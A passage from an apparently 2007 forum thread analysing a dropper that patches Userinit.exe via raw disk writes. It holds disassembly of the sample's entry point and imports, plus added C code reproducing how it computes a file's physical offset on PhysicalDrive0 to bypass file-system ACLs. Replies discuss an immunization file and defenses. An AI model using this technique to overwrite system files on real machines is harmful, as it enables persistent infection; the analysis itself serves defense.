004016A3 E8 9C000000      call explorer.00401744          ; jmp to kernel32.CloseHandle
004016A8 EB 07            jmp short explorer.004016B>
004016AA C745 E4 9D304000 mov dword ptr ss:[ebp-1C],>
004016B1 EB 07            jmp short explorer.004016B>
004016B3 C745 E4 B8304000 mov dword ptr ss:[ebp-1C],>
004016BA 837D F4 00       cmp dword ptr ss:[ebp-C],0
004016BE 74 11            je short explorer.004016D1
004016C0 FF75 F4          push dword ptr ss:[ebp-C]
004016C3 E8 7C000000      call explorer.00401744          ; jmp to kernel32.CloseHandle
004016C8 EB 07            jmp short explorer.004016D>
004016CA C745 E4 CD304000 mov dword ptr ss:[ebp-1C],>
004016D1 FFB5 B8FAFFFF    push dword ptr ss:[ebp-548>
004016D7 E8 68000000      call explorer.00401744          ; jmp to kernel32.CloseHandle
004016DC EB 07            jmp short explorer.004016E>
004016DE C745 E4 DA304000 mov dword ptr ss:[ebp-1C],>
004016E5 61               popad
004016E6 8B45 E4          mov eax,dword ptr ss:[ebp->
004016E9 C9               leave
004016EA C2 0400          retn 4

; --- 004016ED entry point: install the driver, run 0040134E on Userinit.exe, log the result,
; remove the driver again, exit.
004016ED 6A 00            push 0
004016EF E8 80000000      call explorer.00401774          ; jmp to kernel32.GetModuleHandleA
004016F4 A3 F0304000      mov dword ptr ds:[4030F0],>
004016F9 E8 CBF9FFFF      call explorer.004010C9
004016FE 68 00010000      push 100
00401703 68 F4304000      push explorer.004030F4
00401708 68 2B134000      push explorer.0040132B          ; ASCII "%SystemRoot%\System32\Userinit.exe"
0040170D E8 50000000      call explorer.00401762          ; jmp to kernel32.ExpandEnvironmentStringsA
00401712 68 F4304000      push explorer.004030F4
00401717 E8 32FCFFFF      call explorer.0040134E
0040171C 0BC0             or eax,eax
0040171E 75 0C            jnz short explorer.0040172>
00401720 68 E7304000      push explorer.004030E7
00401725 E8 68000000      call explorer.00401792          ; jmp to kernel32.OutputDebugStringA
0040172A EB 06            jmp short explorer.0040173>
0040172C 50               push eax
0040172D E8 60000000      call explorer.00401792          ; jmp to kernel32.OutputDebugStringA
00401732 E8 F9F8FFFF      call explorer.00401030
00401737 6A 00            push 0
00401739 E8 1E000000      call explorer.0040175C          ; jmp to kernel32.ExitProcess

; --- import thunks
0040173E - FF25 00204000  jmp dword ptr ds:[402000]       ; USER32.MessageBoxA
00401744 - FF25 70204000  jmp dword ptr ds:[402070]       ; kernel32.CloseHandle
0040174A - FF25 6C204000  jmp dword ptr ds:[40206C]       ; kernel32.CreateFileA
00401750 - FF25 68204000  jmp dword ptr ds:[402068]       ; kernel32.DeleteFileA
00401756 - FF25 64204000  jmp dword ptr ds:[402064]       ; kernel32.DeviceIoControl
0040175C - FF25 60204000  jmp dword ptr ds:[402060]       ; kernel32.ExitProcess
00401762 - FF25 5C204000  jmp dword ptr ds:[40205C]       ; kernel32.ExpandEnvironmentStringsA
00401768 - FF25 58204000  jmp dword ptr ds:[402058]       ; kernel32.FindResourceA
0040176E - FF25 3C204000  jmp dword ptr ds:[40203C]       ; kernel32.FlushFileBuffers
00401774 - FF25 28204000  jmp dword ptr ds:[402028]       ; kernel32.GetModuleHandleA
0040177A - FF25 2C204000  jmp dword ptr ds:[40202C]       ; kernel32.GlobalAlloc
00401780 - FF25 30204000  jmp dword ptr ds:[402030]       ; kernel32.GlobalFree
00401786 - FF25 34204000  jmp dword ptr ds:[402034]       ; kernel32.LoadResource
0040178C - FF25 38204000  jmp dword ptr ds:[402038]       ; kernel32.SetHandleCount
00401792 - FF25 74204000  jmp dword ptr ds:[402074]       ; kernel32.OutputDebugStringA
00401798 - FF25 40204000  jmp dword ptr ds:[402040]       ; kernel32.ReadFile
0040179E - FF25 44204000  jmp dword ptr ds:[402044]       ; ntdll.RtlZeroMemory
004017A4 - FF25 48204000  jmp dword ptr ds:[402048]       ; kernel32.SetEndOfFile
004017AA - FF25 4C204000  jmp dword ptr ds:[40204C]       ; kernel32.SetFilePointer
004017B0 - FF25 50204000  jmp dword ptr ds:[402050]       ; kernel32.SizeofResource
004017B6 - FF25 54204000  jmp dword ptr ds:[402054]       ; kernel32.WriteFile
004017BC - FF25 20204000  jmp dword ptr ds:[402020]       ; ADVAPI32.CloseServiceHandle
004017C2 - FF25 1C204000  jmp dword ptr ds:[40201C]       ; ADVAPI32.ControlService
004017C8 - FF25 18204000  jmp dword ptr ds:[402018]       ; ADVAPI32.CreateServiceA
004017CE - FF25 14204000  jmp dword ptr ds:[402014]       ; ADVAPI32.DeleteService
004017D4 - FF25 10204000  jmp dword ptr ds:[402010]       ; ADVAPI32.OpenSCManagerA
004017DA - FF25 0C204000  jmp dword ptr ds:[40200C]       ; ADVAPI32.OpenServiceA
004017E0 - FF25 08204000  jmp dword ptr ds:[402008]       ; ADVAPI32.StartServiceA

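The sector arithmetic that icesoul's listing performs between 004013EC and 00401574, and that the first post summarizes as the driver contending with DF for the disk, reimplemented as an added example in portable C. This is not code from the thread or from the sample: it parses a constructed RETRIEVAL_POINTERS_BUFFER, MBR and partition boot sector exactly the way the listing does and returns the raw byte offset the dropper then hands to SetFilePointer on \\.\PhysicalDrive0. The function names (`first_lcn`, `active_partition`, `cluster_area`, `raw_offset`, `locate`) and the sample partition layouts are mine; all buffers are built inline and nothing opens a real disk.

```c
#include <stdint.h>
#include <string.h>

/* Little-endian field access for raw 512-byte sector buffers. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24); }
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }

/* Step 1 (listing 004013EC..00401414): first extent's LCN from the
 * RETRIEVAL_POINTERS_BUFFER filled by FSCTL_GET_RETRIEVAL_POINTERS (0x90073):
 * ExtentCount(4) pad(4) StartingVcn(8) Extents[]{NextVcn(8) Lcn(8)}.
 * Rejects zero extents and an LCN whose low or high dword is -1, as the listing does. */
static int first_lcn(const uint8_t *rp, uint64_t *lcn)
{
    uint64_t l = rd64(rp + 0x18);                 /* edi+10 -> Extents[0], +8 -> Lcn */
    if (rd32(rp) == 0 || (uint32_t)l == 0xFFFFFFFFu || (uint32_t)(l >> 32) == 0xFFFFFFFFu)
        return 0;
    *lcn = l;
    return 1;
}

/* Step 2 (004014AB..004014D8): first MBR entry at 0x1BE must be active (0x80)
 * and FAT32 (0x0B/0x0C) or NTFS (0x07); its start LBA is the dword at 0x1C6. */
static int active_partition(const uint8_t *mbr, uint8_t *type, uint32_t *start_lba)
{
    const uint8_t *e = mbr + 0x1BE;
    if (e[0] != 0x80 || (e[4] != 0x0B && e[4] != 0x0C && e[4] != 0x07)) return 0;
    *type = e[4];
    *start_lba = rd32(e + 8);
    return 1;
}

/* Step 3 (00401520..00401556): cluster area starts at partition start +
 * reserved sectors (word 0x0E), plus FATs (byte 0x10) * sectors per FAT32
 * (dword 0x24) on FAT32 only; sectors per cluster is the byte at 0x0D. */
static void cluster_area(const uint8_t *vbr, uint8_t type, uint32_t start_lba, uint64_t *data_start, uint32_t *spc)
{
    uint64_t s = (uint64_t)start_lba + rd16(vbr + 0x0E);
    if (type == 0x0B || type == 0x0C) s += (uint64_t)vbr[0x10] * rd32(vbr + 0x24);
    *data_start = s;
    *spc = vbr[0x0D];
}

/* Step 4 (0040155C..00401568): physical byte offset. The listing multiplies with
 * 32-bit imul and wraps past 4 GiB of disk; here the arithmetic is 64-bit. */
static uint64_t raw_offset(uint64_t lcn, uint32_t spc, uint64_t data_start) { return (lcn * spc + data_start) * 512u; }

/* Step 5 (004015BD..004015C6, repe cmpsb): raw sector must equal the copy read through the file system. */
static int sector_matches(const uint8_t *raw, const uint8_t *via_fs) { return memcmp(raw, via_fs, 512) == 0; }

/* Steps 1-4 chained; 0 means one of the listing's bail-out checks fired. */
static uint64_t locate(const uint8_t *rp, const uint8_t *mbr, const uint8_t *vbr)
{
    uint64_t lcn, data_start; uint32_t start_lba, spc; uint8_t type;
    if (!first_lcn(rp, &lcn) || !active_partition(mbr, &type, &start_lba)) return 0;
    cluster_area(vbr, type, start_lba, &data_start, &spc);
    return raw_offset(lcn, spc, data_start);
}

/* Constructed sample: NTFS partition at LBA 63, 8 sectors/cluster, file at LCN 0x12345. */
uint64_t demo_ntfs_offset(void)
{
    uint8_t mbr[512] = {0}, vbr[512] = {0}, rp[0x110] = {0};
    mbr[0x1BE] = 0x80; mbr[0x1C2] = 0x07; wr32(mbr + 0x1C6, 63);
    vbr[0x0D] = 8;                                /* reserved sectors (0x0E) stay 0 on NTFS */
    wr32(rp, 1); wr32(rp + 0x18, 0x12345);
    return locate(rp, mbr, vbr);                  /* (0x12345*8 + 63) * 512 = 305450496 */
}

/* Constructed sample: FAT32 partition at LBA 2048, 32 reserved sectors,
 * 2 FATs of 4096 sectors each, 8 sectors/cluster, file at LCN 5. */
uint64_t demo_fat32_offset(void)
{
    uint8_t mbr[512] = {0}, vbr[512] = {0}, rp[0x110] = {0};
    mbr[0x1BE] = 0x80; mbr[0x1C2] = 0x0C; wr32(mbr + 0x1C6, 2048);
    vbr[0x0D] = 8; vbr[0x0E] = 32; vbr[0x10] = 2; wr32(vbr + 0x24, 4096);
    wr32(rp, 1); wr32(rp + 0x18, 5);
    return locate(rp, mbr, vbr);                  /* (5*8 + 2048+32+2*4096) * 512 = 5279744 */
}

/* The bail-outs the listing takes: inactive entry, foreign partition type,
 * LCN == -1, and a raw sector that differs from the file system's copy. */
int demo_rejections(void)
{
    uint8_t mbr[512] = {0}, vbr[512] = {0}, rp[0x110] = {0}, a[512] = {0}, b[512] = {0};
    wr32(rp, 1); wr32(rp + 0x18, 5); mbr[0x1C2] = 0x07;   /* active flag left 0x00 */
    if (locate(rp, mbr, vbr) != 0) return 0;
    mbr[0x1BE] = 0x80; mbr[0x1C2] = 0x83;                  /* Linux type: not handled */
    if (locate(rp, mbr, vbr) != 0) return 0;
    mbr[0x1C2] = 0x07; wr32(rp + 0x18, 0xFFFFFFFFu);       /* low dword of LCN == -1 */
    if (locate(rp, mbr, vbr) != 0) return 0;
    b[100] = 1;
    return sector_matches(a, a) && !sector_matches(a, b);
}
```

Two practical points follow from this arithmetic. The final WriteFile in the listing (00401657) goes to the \\.\PhysicalDrive0 handle at the computed offset, not to the file, so the NTFS ACL that the first post's batch file puts on userinit.exe is never consulted for that write; the immunization file works for a different reason, namely that the dropper's CreateFileA on pcihdd.sys at 00401160 returns -1 when it cannot open the path for writing and the code jumps to the MessageBoxA/ExitProcess exit at 00401314. And because the listing's `imul eax,eax,200` at 00401568 is a 32-bit multiply, the offset it computes is only correct for files whose first cluster lies within the first 4 GiB of the disk; the example above keeps the full 64-bit value.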
Floor 6 | fsgmlion | Post By: 2007-9-18 22:15:27


User has been blocked

Floor 7 | makck | Post By: 2007-9-23 1:27:34


Bookmark!

Floor 8 | 8091602 | Post By: 2007-9-24 13:56:49


I've thought of a way, but I'm a newbie and the spirit is willing while the skill is lacking; let me put it out there and you can see whether it can be done.

During the Windows startup process allow no network access; only connect once the welcome screen is reached. How about that?

Would that be a permanent defense?

But I have no way to implement it; let's think it over together.

Floor 9 | 8091602 | Post By: 2007-9-24 13:57:40


Also, don't let userinit.exe

Floor 10 | comebaby888 | Post By: 2007-9-24 14:01:11


Bookmark~~~ taking a look

Floor 11 | zhb825 | Post By: 2007-9-25 23:56:47


Bump. Taking a look.

Floor 12 | j46402047 | Post By: 2007-11-19 3:17:11


A bit messy; I can't make sense of that much program code.

Floor 13 | ltj0001 | Post By: 2007-11-25 16:32:39


Bookmark~~~ taking a look

Floor 14 | xmdnan | Post By: 2007-12-23 19:03:00


This source code is a good thing for the experts; for a newbie like me,

350335615